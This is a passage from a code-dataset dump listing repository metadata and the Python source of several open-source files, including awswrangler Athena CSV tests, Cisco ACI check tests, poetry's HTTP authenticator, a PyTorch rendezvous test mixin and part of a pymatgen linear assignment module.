hexsha
stringlengths
40
40
size
int64
1
1.03M
ext
stringclasses
10 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
3
239
max_stars_repo_name
stringlengths
5
130
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
listlengths
1
10
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
3
239
max_issues_repo_name
stringlengths
5
130
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
listlengths
1
10
max_issues_count
int64
1
67k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
3
239
max_forks_repo_name
stringlengths
5
130
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
listlengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
1
1.03M
avg_line_length
float64
1
958k
max_line_length
int64
1
1.03M
alphanum_fraction
float64
0
1
795a70c0755c376feba74697bf3491d3bb6d58e8
15,826
py
Python
tests/test_athena_csv.py
ibanmarco/aws-data-wrangler
e99937296075c671e5f8a0998b430879c808687d
[ "Apache-2.0" ]
1
2020-11-10T12:37:08.000Z
2020-11-10T12:37:08.000Z
tests/test_athena_csv.py
ibanmarco/aws-data-wrangler
e99937296075c671e5f8a0998b430879c808687d
[ "Apache-2.0" ]
null
null
null
tests/test_athena_csv.py
ibanmarco/aws-data-wrangler
e99937296075c671e5f8a0998b430879c808687d
[ "Apache-2.0" ]
null
null
null
import logging import time import boto3 import pandas as pd import pytest import awswrangler as wr from ._utils import ensure_data_types_csv, get_df_csv logging.getLogger("awswrangler").setLevel(logging.DEBUG) @pytest.mark.parametrize("use_threads", [True, False]) @pytest.mark.parametrize("concurrent_partitioning", [True, False]) def test_to_csv_modes(glue_database, glue_table, path, use_threads, concurrent_partitioning): # Round 1 - Warm up df = pd.DataFrame({"c0": [0, 1]}, dtype="Int64") paths = wr.s3.to_csv( df=df, path=path, dataset=True, mode="overwrite", database=glue_database, table=glue_table, description="c0", parameters={"num_cols": str(len(df.columns)), "num_rows": str(len(df.index))}, columns_comments={"c0": "0"}, use_threads=use_threads, concurrent_partitioning=concurrent_partitioning, index=False, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads) assert df.shape == df2.shape assert df.c0.sum() == df2.c0.sum() parameters = wr.catalog.get_table_parameters(glue_database, glue_table) assert len(parameters) >= 5 assert parameters["num_cols"] == str(len(df2.columns)) assert parameters["num_rows"] == str(len(df2.index)) assert wr.catalog.get_table_description(glue_database, glue_table) == "c0" comments = wr.catalog.get_columns_comments(glue_database, glue_table) assert len(comments) == len(df.columns) assert comments["c0"] == "0" # Round 2 - Overwrite df = pd.DataFrame({"c1": [0, 1, 2]}, dtype="Int16") paths = wr.s3.to_csv( df=df, path=path, dataset=True, mode="overwrite", database=glue_database, table=glue_table, description="c1", parameters={"num_cols": str(len(df.columns)), "num_rows": str(len(df.index))}, columns_comments={"c1": "1"}, use_threads=use_threads, concurrent_partitioning=concurrent_partitioning, index=False, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, 
use_threads=use_threads) assert df.shape == df2.shape assert df.c1.sum() == df2.c1.sum() parameters = wr.catalog.get_table_parameters(glue_database, glue_table) assert len(parameters) >= 5 assert parameters["num_cols"] == str(len(df2.columns)) assert parameters["num_rows"] == str(len(df2.index)) assert wr.catalog.get_table_description(glue_database, glue_table) == "c1" comments = wr.catalog.get_columns_comments(glue_database, glue_table) assert len(comments) == len(df.columns) assert comments["c1"] == "1" # Round 3 - Append df = pd.DataFrame({"c1": [0, 1, 2]}, dtype="Int8") paths = wr.s3.to_csv( df=df, path=path, dataset=True, mode="append", database=glue_database, table=glue_table, description="c1", parameters={"num_cols": str(len(df.columns)), "num_rows": str(len(df.index) * 2)}, columns_comments={"c1": "1"}, use_threads=use_threads, concurrent_partitioning=concurrent_partitioning, index=False, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads) assert len(df.columns) == len(df2.columns) assert len(df.index) * 2 == len(df2.index) assert df.c1.sum() + 3 == df2.c1.sum() parameters = wr.catalog.get_table_parameters(glue_database, glue_table) assert len(parameters) >= 5 assert parameters["num_cols"] == str(len(df2.columns)) assert parameters["num_rows"] == str(len(df2.index)) assert wr.catalog.get_table_description(glue_database, glue_table) == "c1" comments = wr.catalog.get_columns_comments(glue_database, glue_table) assert len(comments) == len(df.columns) assert comments["c1"] == "1" # Round 4 - Overwrite Partitioned df = pd.DataFrame({"c0": ["foo", "boo"], "c1": [0, 1]}) paths = wr.s3.to_csv( df=df, path=path, dataset=True, mode="overwrite", database=glue_database, table=glue_table, partition_cols=["c1"], description="c0+c1", parameters={"num_cols": "2", "num_rows": "2"}, columns_comments={"c0": "zero", "c1": "one"}, use_threads=use_threads, 
concurrent_partitioning=concurrent_partitioning, index=False, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads) assert df.shape == df2.shape assert df.c1.sum() == df2.c1.sum() parameters = wr.catalog.get_table_parameters(glue_database, glue_table) assert len(parameters) >= 5 assert parameters["num_cols"] == "2" assert parameters["num_rows"] == "2" assert wr.catalog.get_table_description(glue_database, glue_table) == "c0+c1" comments = wr.catalog.get_columns_comments(glue_database, glue_table) assert len(comments) == len(df.columns) assert comments["c0"] == "zero" assert comments["c1"] == "one" # Round 5 - Overwrite Partitions df = pd.DataFrame({"c0": ["bar", "abc"], "c1": [0, 2]}) paths = wr.s3.to_csv( df=df, path=path, dataset=True, mode="overwrite_partitions", database=glue_database, table=glue_table, partition_cols=["c1"], description="c0+c1", parameters={"num_cols": "2", "num_rows": "3"}, columns_comments={"c0": "zero", "c1": "one"}, concurrent_partitioning=concurrent_partitioning, use_threads=use_threads, index=False, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads) assert len(df2.columns) == 2 assert len(df2.index) == 3 assert df2.c1.sum() == 3 parameters = wr.catalog.get_table_parameters(glue_database, glue_table) assert len(parameters) >= 5 assert parameters["num_cols"] == "2" assert parameters["num_rows"] == "3" assert wr.catalog.get_table_description(glue_database, glue_table) == "c0+c1" comments = wr.catalog.get_columns_comments(glue_database, glue_table) assert len(comments) == len(df.columns) assert comments["c0"] == "zero" assert comments["c1"] == "one" @pytest.mark.parametrize("use_threads", [True, False]) def test_csv_overwrite_several_partitions(path, glue_database, glue_table, use_threads): df0 = pd.DataFrame({"id": list(range(27)), 
"par": list(range(27))}) df1 = pd.DataFrame({"id": list(range(26)), "par": list(range(26))}) for df in (df0, df1): paths = wr.s3.to_csv( df=df, path=path, index=False, use_threads=use_threads, dataset=True, partition_cols=["par"], mode="overwrite", table=glue_table, database=glue_database, concurrent_partitioning=True, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads) assert df2.shape == df.shape assert df2["id"].sum() == df["id"].sum() assert df2["par"].sum() == df["par"].sum() def test_csv_dataset(path, glue_database): with pytest.raises(wr.exceptions.UndetectedType): wr.s3.to_csv(pd.DataFrame({"A": [None]}), path, dataset=True, database=glue_database, table="test_csv_dataset") df = get_df_csv() with pytest.raises(wr.exceptions.InvalidArgumentCombination): wr.s3.to_csv(df, path + "0", dataset=False, mode="overwrite", database=glue_database, table="test_csv_dataset") with pytest.raises(wr.exceptions.InvalidArgumentCombination): wr.s3.to_csv(df, path + "0", dataset=False, table="test_csv_dataset") with pytest.raises(wr.exceptions.InvalidArgumentCombination): wr.s3.to_csv(df=df, path=path + "0", mode="append") with pytest.raises(wr.exceptions.InvalidArgumentCombination): wr.s3.to_csv(df=df, path=path + "0", partition_cols=["col2"]) with pytest.raises(wr.exceptions.InvalidArgumentCombination): wr.s3.to_csv(df=df, path=path + "0", description="foo") with pytest.raises(wr.exceptions.InvalidArgumentValue): wr.s3.to_csv(df=df, path=path + "0", partition_cols=["col2"], dataset=True, mode="WRONG") paths = wr.s3.to_csv( df=df, path=path, sep="|", index=False, use_threads=True, boto3_session=None, s3_additional_kwargs=None, dataset=True, partition_cols=["par0", "par1"], mode="overwrite", )["paths"] wr.s3.wait_objects_exist(paths=paths) df2 = wr.s3.read_csv(path=paths, sep="|", header=None) assert len(df2.index) == 3 assert len(df2.columns) == 8 assert df2[0].sum() == 6 
wr.s3.delete_objects(path=paths) @pytest.mark.parametrize("use_threads", [True, False]) @pytest.mark.parametrize("concurrent_partitioning", [True, False]) def test_csv_catalog(path, glue_table, glue_database, use_threads, concurrent_partitioning): df = get_df_csv() paths = wr.s3.to_csv( df=df, path=path, sep="\t", index=True, use_threads=use_threads, boto3_session=None, s3_additional_kwargs=None, dataset=True, partition_cols=["par0", "par1"], mode="overwrite", table=glue_table, database=glue_database, concurrent_partitioning=concurrent_partitioning, )["paths"] wr.s3.wait_objects_exist(paths=paths) df2 = wr.athena.read_sql_table(glue_table, glue_database) assert len(df2.index) == 3 assert len(df2.columns) == 11 assert df2["id"].sum() == 6 ensure_data_types_csv(df2) wr.s3.delete_objects(path=paths) assert wr.catalog.delete_table_if_exists(database=glue_database, table=glue_table) is True @pytest.mark.parametrize("use_threads", [True, False]) @pytest.mark.parametrize("concurrent_partitioning", [True, False]) def test_csv_catalog_columns(path, glue_database, glue_table, use_threads, concurrent_partitioning): paths = wr.s3.to_csv( df=get_df_csv(), path=path, sep="|", columns=["id", "date", "timestamp", "par0", "par1"], index=False, use_threads=use_threads, boto3_session=None, s3_additional_kwargs=None, dataset=True, partition_cols=["par0", "par1"], mode="overwrite", table=glue_table, database=glue_database, concurrent_partitioning=concurrent_partitioning, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads) assert len(df2.index) == 3 assert len(df2.columns) == 5 assert df2["id"].sum() == 6 ensure_data_types_csv(df2) paths = wr.s3.to_csv( df=pd.DataFrame({"id": [4], "date": [None], "timestamp": [None], "par0": [1], "par1": ["a"]}), path=path, sep="|", index=False, use_threads=use_threads, boto3_session=None, s3_additional_kwargs=None, dataset=True, 
partition_cols=["par0", "par1"], mode="overwrite_partitions", table=glue_table, database=glue_database, concurrent_partitioning=concurrent_partitioning, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads) assert len(df2.index) == 3 assert len(df2.columns) == 5 assert df2["id"].sum() == 9 ensure_data_types_csv(df2) def test_athena_csv_types(path, glue_database, glue_table): df = get_df_csv() paths = wr.s3.to_csv( df=df, path=path, sep=",", index=False, use_threads=True, boto3_session=None, s3_additional_kwargs=None, dataset=True, partition_cols=["par0", "par1"], mode="overwrite", )["paths"] wr.s3.wait_objects_exist(paths=paths) columns_types, partitions_types = wr.catalog.extract_athena_types( df=df, index=False, partition_cols=["par0", "par1"], file_format="csv" ) wr.catalog.create_csv_table( table=glue_table, database=glue_database, path=path, partitions_types=partitions_types, columns_types=columns_types, ) columns_types["col0"] = "string" with pytest.raises(wr.exceptions.InvalidArgumentValue): wr.catalog.create_csv_table( database=glue_database, table=glue_table, path=path, columns_types=columns_types, mode="append" ) wr.athena.repair_table(glue_table, glue_database) assert len(wr.catalog.get_csv_partitions(glue_database, glue_table)) == 3 df2 = wr.athena.read_sql_table(glue_table, glue_database) assert len(df2.index) == 3 assert len(df2.columns) == 10 assert df2["id"].sum() == 6 ensure_data_types_csv(df2) wr.s3.delete_objects(path=paths) assert wr.catalog.delete_table_if_exists(database=glue_database, table=glue_table) is True @pytest.mark.parametrize("use_threads", [True, False]) @pytest.mark.parametrize("ctas_approach", [True, False]) def test_skip_header(path, glue_database, glue_table, use_threads, ctas_approach): df = pd.DataFrame({"c0": [1, 2], "c1": [3.3, 4.4], "c2": ["foo", "boo"]}) df["c0"] = df["c0"].astype("Int64") df["c2"] = 
df["c2"].astype("string") paths = wr.s3.to_csv(df=df, path=f"{path}0.csv", sep=",", index=False, header=True, use_threads=use_threads)[ "paths" ] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) wr.catalog.create_csv_table( database=glue_database, table=glue_table, path=path, columns_types={"c0": "bigint", "c1": "double", "c2": "string"}, skip_header_line_count=1, ) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads, ctas_approach=ctas_approach) assert df.equals(df2) @pytest.mark.parametrize("use_threads", [True, False]) def test_empty_column(path, glue_table, glue_database, use_threads): df = pd.DataFrame({"c0": [1, 2, 3], "c1": [None, None, None], "par": ["a", "b", "c"]}) df["c0"] = df["c0"].astype("Int64") df["par"] = df["par"].astype("string") with pytest.raises(wr.exceptions.UndetectedType): wr.s3.to_csv( df, path, index=False, dataset=True, table=glue_table, database=glue_database, partition_cols=["par"] ) @pytest.mark.parametrize("use_threads", [True, False]) def test_mixed_types_column(path, glue_table, glue_database, use_threads): df = pd.DataFrame({"c0": [1, 2, 3], "c1": [1, 2, "foo"], "par": ["a", "b", "c"]}) df["c0"] = df["c0"].astype("Int64") df["par"] = df["par"].astype("string") with pytest.raises(TypeError): wr.s3.to_csv( df, path, index=False, dataset=True, table=glue_table, database=glue_database, partition_cols=["par"] ) @pytest.mark.parametrize("use_threads", [True, False]) def test_failing_catalog(path, glue_table, glue_database, use_threads): df = pd.DataFrame({"c0": [1, 2, 3]}) try: wr.s3.to_csv(df, path, dataset=True, table=glue_table, database="foo") except boto3.client("glue").exceptions.EntityNotFoundException: pass time.sleep(3) assert len(wr.s3.list_objects(path)) == 0
39.368159
119
0.652913
795a71555e363945b36c3696a00672c22fc516a3
3,978
py
Python
cisco_aci/tests/test_cisco.py
tcpatterson/integrations-core
3692601de09f8db60f42612b0d623509415bbb53
[ "BSD-3-Clause" ]
1
2021-12-15T22:45:14.000Z
2021-12-15T22:45:14.000Z
cisco_aci/tests/test_cisco.py
tcpatterson/integrations-core
3692601de09f8db60f42612b0d623509415bbb53
[ "BSD-3-Clause" ]
null
null
null
cisco_aci/tests/test_cisco.py
tcpatterson/integrations-core
3692601de09f8db60f42612b0d623509415bbb53
[ "BSD-3-Clause" ]
null
null
null
# (C) Datadog, Inc. 2010-present # All rights reserved # Licensed under Simplified BSD License (see LICENSE) import os from copy import deepcopy import pytest from mock import MagicMock from datadog_checks.base import AgentCheck from datadog_checks.base.utils.containers import hash_mutable from datadog_checks.cisco_aci import CiscoACICheck from datadog_checks.cisco_aci.api import Api, SessionWrapper from . import common def test_cisco(aggregator): cisco_aci_check = CiscoACICheck(common.CHECK_NAME, {}, [common.CONFIG]) api = Api(common.ACI_URLS, cisco_aci_check.http, common.USERNAME, password=common.PASSWORD, log=cisco_aci_check.log) api.wrapper_factory = common.FakeSessionWrapper cisco_aci_check._api_cache[hash_mutable(common.CONFIG)] = api cisco_aci_check.check({}) @pytest.mark.parametrize( ' api_kwargs', [ pytest.param({'password': common.PASSWORD}, id='login with password'), pytest.param( {'cert_name': 'foo', 'cert_key': open(os.path.join(common.CERTIFICATE_DIR, 'cert.pem'), 'rb').read()}, id='login with cert', ), ], ) def test_recover_from_expired_token(aggregator, api_kwargs): # First api answers with 403 to force the check to re-authenticate unauthentified_response = MagicMock(status_code=403) # Api answer when a request is being made to the login endpoint login_response = MagicMock() # Third api answer, when the check retries the initial endpoint but is now authenticated valid_response = MagicMock() valid_response.json = MagicMock(return_value={"foo": "bar"}) http = MagicMock() http.post = MagicMock(side_effect=[login_response]) http.get = MagicMock(side_effect=[unauthentified_response, valid_response]) session_wrapper = SessionWrapper(aci_url=common.ACI_URL, http=http, log=MagicMock()) session_wrapper.apic_cookie = "cookie" api = Api(common.ACI_URLS, http, common.USERNAME, **api_kwargs) api.sessions = {common.ACI_URL: session_wrapper} data = api.make_request("") # Assert that we retrieved the value from `valid_response.json()` assert data == {"foo": "bar"} 
get_calls = http.get._mock_call_args_list post_calls = http.post._mock_call_args_list # Assert that the first call was to the ACI_URL assert get_calls[0].args[0] == common.ACI_URL if 'password' in api_kwargs: # Assert that the second call was to the login endpoint assert 'aaaLogin.xml' in post_calls[0].args[0] # Assert that the last call was to the ACI_URL again assert get_calls[1].args[0] == common.ACI_URL # Assert session correctly renewed assert len(api.sessions) == 1 # check the number of sessions doesn't grow assert api.sessions[common.ACI_URL] != session_wrapper # check session renewed # Assert cookie to check the session changed assert get_calls[0].kwargs['headers']['Cookie'] == 'cookie' assert get_calls[1].kwargs['headers']['Cookie'] != 'cookie' @pytest.mark.parametrize( 'extra_config, expected_http_kwargs', [ pytest.param({'pwd': 'foobar'}, {'auth': (common.USERNAME, 'foobar'), 'verify': True}, id='new auth config'), pytest.param({'ssl_verify': True}, {'verify': True}, id='legacy ssl verify config True'), pytest.param({'ssl_verify': False}, {'verify': False}, id='legacy ssl verify config False'), ], ) def test_config(aggregator, extra_config, expected_http_kwargs): instance = deepcopy(common.CONFIG_WITH_TAGS) instance.update(extra_config) check = CiscoACICheck(common.CHECK_NAME, {}, [instance]) actual_options = {k: v for k, v in check.http.options.items() if k in expected_http_kwargs} assert expected_http_kwargs == actual_options @pytest.mark.e2e def test_e2e(dd_agent_check, aggregator, instance): with pytest.raises(Exception): dd_agent_check(instance) aggregator.assert_service_check("cisco_aci.can_connect", AgentCheck.CRITICAL)
38.25
120
0.718451
795a72719f66509be114338cc84f7f1949caff8e
4,381
py
Python
poetry/installation/authenticator.py
noamraph/poetry
0d48fb669e42d2b662b8e0abef6af8c8bb9ab68a
[ "MIT" ]
1
2020-08-19T19:51:22.000Z
2020-08-19T19:51:22.000Z
poetry/installation/authenticator.py
noamraph/poetry
0d48fb669e42d2b662b8e0abef6af8c8bb9ab68a
[ "MIT" ]
null
null
null
poetry/installation/authenticator.py
noamraph/poetry
0d48fb669e42d2b662b8e0abef6af8c8bb9ab68a
[ "MIT" ]
1
2021-11-16T13:29:42.000Z
2021-11-16T13:29:42.000Z
from typing import TYPE_CHECKING from poetry.utils._compat import urlparse from poetry.utils.password_manager import PasswordManager if TYPE_CHECKING: from typing import Any from typing import Optional from typing import Tuple from clikit.api.io import IO from requests import Request # noqa from requests import Response # noqa from requests import Session # noqa from poetry.config.config import Config class Authenticator(object): def __init__(self, config, io): # type: (Config, IO) -> None self._config = config self._io = io self._session = None self._credentials = {} self._password_manager = PasswordManager(self._config) @property def session(self): # type: () -> Session from requests import Session # noqa if self._session is None: self._session = Session() return self._session def request(self, method, url, **kwargs): # type: (str, str, Any) -> Response from requests import Request # noqa from requests.auth import HTTPBasicAuth request = Request(method, url) username, password = self._get_credentials_for_url(url) if username is not None and password is not None: request = HTTPBasicAuth(username, password)(request) session = self.session prepared_request = session.prepare_request(request) proxies = kwargs.get("proxies", {}) stream = kwargs.get("stream") verify = kwargs.get("verify") cert = kwargs.get("cert") settings = session.merge_environment_settings( prepared_request.url, proxies, stream, verify, cert ) # Send the request. 
send_kwargs = { "timeout": kwargs.get("timeout"), "allow_redirects": kwargs.get("allow_redirects", True), } send_kwargs.update(settings) resp = session.send(prepared_request, **send_kwargs) resp.raise_for_status() return resp def _get_credentials_for_url( self, url ): # type: (str) -> Tuple[Optional[str], Optional[str]] parsed_url = urlparse.urlsplit(url) netloc = parsed_url.netloc credentials = self._credentials.get(netloc, (None, None)) if credentials == (None, None): if "@" not in netloc: credentials = self._get_credentials_for_netloc_from_config(netloc) else: # Split from the right because that's how urllib.parse.urlsplit() # behaves if more than one @ is present (which can be checked using # the password attribute of urlsplit()'s return value). auth, netloc = netloc.rsplit("@", 1) if ":" in auth: # Split from the left because that's how urllib.parse.urlsplit() # behaves if more than one : is present (which again can be checked # using the password attribute of the return value) credentials = auth.split(":", 1) else: credentials = auth, None credentials = tuple( None if x is None else urlparse.unquote(x) for x in credentials ) if credentials[0] is not None or credentials[1] is not None: credentials = (credentials[0] or "", credentials[1] or "") self._credentials[netloc] = credentials return credentials[0], credentials[1] def _get_credentials_for_netloc_from_config( self, netloc ): # type: (str) -> Tuple[Optional[str], Optional[str]] credentials = (None, None) for repository_name in self._config.get("http-basic", {}): repository_config = self._config.get( "repositories.{}".format(repository_name) ) if not repository_config: continue url = repository_config.get("url") if not url: continue parsed_url = urlparse.urlsplit(url) if netloc == parsed_url.netloc: auth = self._password_manager.get_http_auth(repository_name) if auth is None: continue return auth["username"], auth["password"] return credentials
32.69403
87
0.594157
795a72a1bfbdb03846e4796f5c3981f409050717
3,358
py
Python
test/distributed/elastic/rendezvous/rendezvous_backend_test.py
Hacky-DH/pytorch
80dc4be615854570aa39a7e36495897d8a040ecc
[ "Intel" ]
60,067
2017-01-18T17:21:31.000Z
2022-03-31T21:37:45.000Z
test/distributed/elastic/rendezvous/rendezvous_backend_test.py
Hacky-DH/pytorch
80dc4be615854570aa39a7e36495897d8a040ecc
[ "Intel" ]
66,955
2017-01-18T17:21:38.000Z
2022-03-31T23:56:11.000Z
test/distributed/elastic/rendezvous/rendezvous_backend_test.py
Hacky-DH/pytorch
80dc4be615854570aa39a7e36495897d8a040ecc
[ "Intel" ]
19,210
2017-01-18T17:45:04.000Z
2022-03-31T23:51:56.000Z
# Copyright (c) Facebook, Inc. and its affiliates. # All rights reserved. # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. from abc import ABC, abstractmethod from typing import Any, Callable, Optional, Tuple, cast from torch.distributed.elastic.rendezvous import RendezvousStateError from torch.distributed.elastic.rendezvous.dynamic_rendezvous import RendezvousBackend, Token class RendezvousBackendTestMixin(ABC): _backend: RendezvousBackend # Type hints assertEqual: Callable assertNotEqual: Callable assertIsNone: Callable assertIsNotNone: Callable assertRaises: Callable @abstractmethod def _corrupt_state(self) -> None: """Corrupts the state stored in the backend.""" pass def _set_state(self, state: bytes, token: Optional[Any] = None) -> Tuple[bytes, Token, bool]: result = self._backend.set_state(state, token) self.assertIsNotNone(result) return cast(Tuple[bytes, Token, bool], result) def test_get_state_returns_backend_state(self) -> None: self._backend.set_state(b"x") result = self._backend.get_state() self.assertIsNotNone(result) state, token = cast(Tuple[bytes, Token], result) self.assertEqual(b"x", state) self.assertIsNotNone(token) def test_get_state_returns_none_if_backend_state_does_not_exist(self) -> None: result = self._backend.get_state() self.assertIsNone(result) def test_get_state_raises_error_if_backend_state_is_corrupt(self) -> None: self._corrupt_state() with self.assertRaises(RendezvousStateError): self._backend.get_state() def test_set_state_sets_backend_state_if_it_does_not_exist(self) -> None: state, token, has_set = self._set_state(b"x") self.assertEqual(b"x", state) self.assertIsNotNone(token) self.assertTrue(has_set) def test_set_state_sets_backend_state_if_token_is_current(self) -> None: state1, token1, has_set1 = self._set_state(b"x") state2, token2, has_set2 = self._set_state(b"y", token1) self.assertEqual(b"y", state2) self.assertNotEqual(token1, token2) 
self.assertTrue(has_set1) self.assertTrue(has_set2) def test_set_state_returns_current_backend_state_if_token_is_old(self) -> None: state1, token1, _ = self._set_state(b"x") state2, token2, _ = self._set_state(b"y", token1) state3, token3, has_set = self._set_state(b"z", token1) self.assertEqual(state2, state3) self.assertEqual(token2, token3) self.assertFalse(has_set) def test_set_state_returns_current_backend_state_if_token_is_none(self) -> None: state1, token1, _ = self._set_state(b"x") state2, token2, has_set = self._set_state(b"y") self.assertEqual(state1, state2) self.assertEqual(token1, token2) self.assertFalse(has_set) def test_set_state_returns_current_backend_state_if_token_is_invalid(self) -> None: state1, token1, _ = self._set_state(b"x") state2, token2, has_set = self._set_state(b"y", token="invalid") self.assertEqual(state1, state2) self.assertEqual(token1, token2) self.assertFalse(has_set)
32.288462
97
0.699821
795a72e90423251835b9fbe90e8dcb4d5aec995b
269
py
Python
scripts/component_graph/far/__init__.py
opensource-assist/fuschia
66646c55b3d0b36aae90a4b6706b87f1a6261935
[ "BSD-3-Clause" ]
3
2020-08-02T04:46:18.000Z
2020-08-07T10:10:53.000Z
scripts/component_graph/far/__init__.py
opensource-assist/fuschia
66646c55b3d0b36aae90a4b6706b87f1a6261935
[ "BSD-3-Clause" ]
null
null
null
scripts/component_graph/far/__init__.py
opensource-assist/fuschia
66646c55b3d0b36aae90a4b6706b87f1a6261935
[ "BSD-3-Clause" ]
1
2020-08-07T10:11:49.000Z
2020-08-07T10:11:49.000Z
#!/usr/bin/env python3 # Copyright 2019 The Fuchsia Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """The FAR module provides support for parsing FAR files.""" import far.far_reader
29.888889
72
0.758364
795a74090d851905a6c18668ca7f8eee147d9a74
1,782
py
Python
pie/scripts/tag_pipe.py
lascivaroma/PaPie
260440d0ad27a853350bdc4cf2a77d1655e231f8
[ "MIT" ]
16
2019-01-17T08:15:41.000Z
2021-11-12T15:17:41.000Z
pie/scripts/tag_pipe.py
lascivaroma/PaPie
260440d0ad27a853350bdc4cf2a77d1655e231f8
[ "MIT" ]
64
2018-12-16T14:52:51.000Z
2021-05-20T07:58:40.000Z
pie/scripts/tag_pipe.py
datatjej/pie
0ca4311a57b2439994e5fcdc02f4d008ee268a9c
[ "MIT" ]
4
2019-03-29T14:35:02.000Z
2021-05-19T13:31:48.000Z
# Can be run with python -m pie.scripts.tag_pipe import sys from pie import utils from pie.tagger import Tagger, simple_tokenizer def run(model_spec, device, batch_size, lower, beam_width, use_beam, tokenize): with utils.shutup(): tagger = Tagger(device=device, batch_size=batch_size, lower=lower) for model, tasks in model_spec: tagger.add_model(model, *tasks) tasks = tasks or tagger.models[-1][0].label_encoder.tasks header = False for line in sys.stdin: if not line: continue if tokenize: line = simple_tokenizer(line, lower) else: line = line.split() preds, tasks = tagger.tag( [line], [len(line)], use_beam=use_beam, beam_width=beam_width) if not header: print('\t'.join(['token'] + tasks)) header = True preds = preds[0] # unpack tokens, tags = zip(*preds) for token, tags in zip(tokens, tags): print('\t'.join([token] + list(tags))) if __name__ == '__main__': import argparse parser = argparse.ArgumentParser() parser.add_argument('model_spec', type=utils.model_spec) parser.add_argument('--device', default='cpu') parser.add_argument('--use_beam', action='store_true') parser.add_argument('--batch_size', type=int, default=50) parser.add_argument('--beam_width', default=10, type=int) parser.add_argument('--lower', action='store_true') parser.add_argument('--tokenize', action='store_true') args = parser.parse_args() run(model_spec=args.model_spec, device=args.device, batch_size=args.batch_size, lower=args.lower, beam_width=args.beam_width, use_beam=args.use_beam, tokenize=args.tokenize)
33
79
0.640292
795a75671aa69e98d5c33cc93d7871e6af3e8895
7,504
py
Python
pymatgen/optimization/linear_assignment.py
miaoliu/pymatgen
fe3c48ce3334924e6693f857aebc64b9714d1af2
[ "MIT" ]
1
2022-02-28T04:24:46.000Z
2022-02-28T04:24:46.000Z
pymatgen/optimization/linear_assignment.py
miaoliu/pymatgen
fe3c48ce3334924e6693f857aebc64b9714d1af2
[ "MIT" ]
null
null
null
pymatgen/optimization/linear_assignment.py
miaoliu/pymatgen
fe3c48ce3334924e6693f857aebc64b9714d1af2
[ "MIT" ]
null
null
null
#!/usr/bin/env python """ This module contains an algorithm to solve the Linear Assignment Problem """ from __future__ import division __author__ = "Will Richards" __copyright__ = "Copyright 2011, The Materials Project" __version__ = "1.0" __maintainer__ = "Will Richards" __email__ = "wrichards@mit.edu" __date__ = "Jan 28, 2013" import numpy as np class LinearAssignment(object): """ This class finds the solution to the Linear Assignment Problem. It finds a minimum cost matching between two sets, given a cost matrix. This class is an implementation of the LAPJV algorithm described in: R. Jonker, A. Volgenant. A Shortest Augmenting Path Algorithm for Dense and Sparse Linear Assignment Problems. Computing 38, 325-340 (1987) .. attribute: min_cost: The minimum cost of the matching .. attribute: solution: The matching of the rows to columns. i.e solution = [1, 2, 0] would match row 0 to column 1, row 1 to column 2 and row 2 to column 0. Total cost would be c[0, 1] + c[1, 2] + c[2, 0] """ def __init__(self, costs, epsilon=-1e-6): """ Args: costs: The cost matrix of the problem. cost[i,j] should be the cost of matching x[i] to y[j]. 
The cost matrix must be square epsilon: tolerance for determining if solution vector is < 0 """ self.c = np.array(costs) self.n = len(costs) if epsilon < 0: self.epsilon = epsilon else: raise ValueError("epsilon must be negative") #check that cost matrix is square if self.c.shape != (self.n, self.n): raise ValueError("cost matrix is not square") #initialize solution vectors self._x = np.zeros(self.n, dtype=np.int) - 1 self._y = np.zeros(self.n, dtype=np.int) - 1 #if column reduction doesn't find a solution, augment with shortest #paths until one is found if self._column_reduction(): self._augmenting_row_reduction() #initialize the reduced costs self._update_cred() while np.min(self._x) < self.epsilon: self._augment() self.solution = self._x self._min_cost = None @property def min_cost(self): """ Returns the cost of the best assignment """ if self._min_cost: return self._min_cost self._min_cost = np.sum(self.c[np.arange(len(self.c)), self.solution]) return self._min_cost def _column_reduction(self): """ Column reduction and reduction transfer steps from LAPJV algorithm """ #assign each column to its lowest cost row, ensuring that only row #or column is assigned once i1, j = np.unique(np.argmin(self.c, axis=0), return_index=True) self._x[i1] = j #if problem is solved, return if len(i1) == self.n: return False self._y[j] = i1 #reduction_transfer #tempc is array with previously assigned matchings masked self._v = np.min(self.c, axis=0) tempc = self.c.copy() tempc[i1, j] = np.max(tempc.flatten()) * 10 mu = np.min(tempc[i1, :] - self._v[None, :], axis=1) self._v[j] -= mu return True def _augmenting_row_reduction(self): """ Augmenting row reduction step from LAPJV algorithm """ unassigned = np.where(self._x == -1)[0] for i in unassigned: while True: #find smallest 2 values and indices 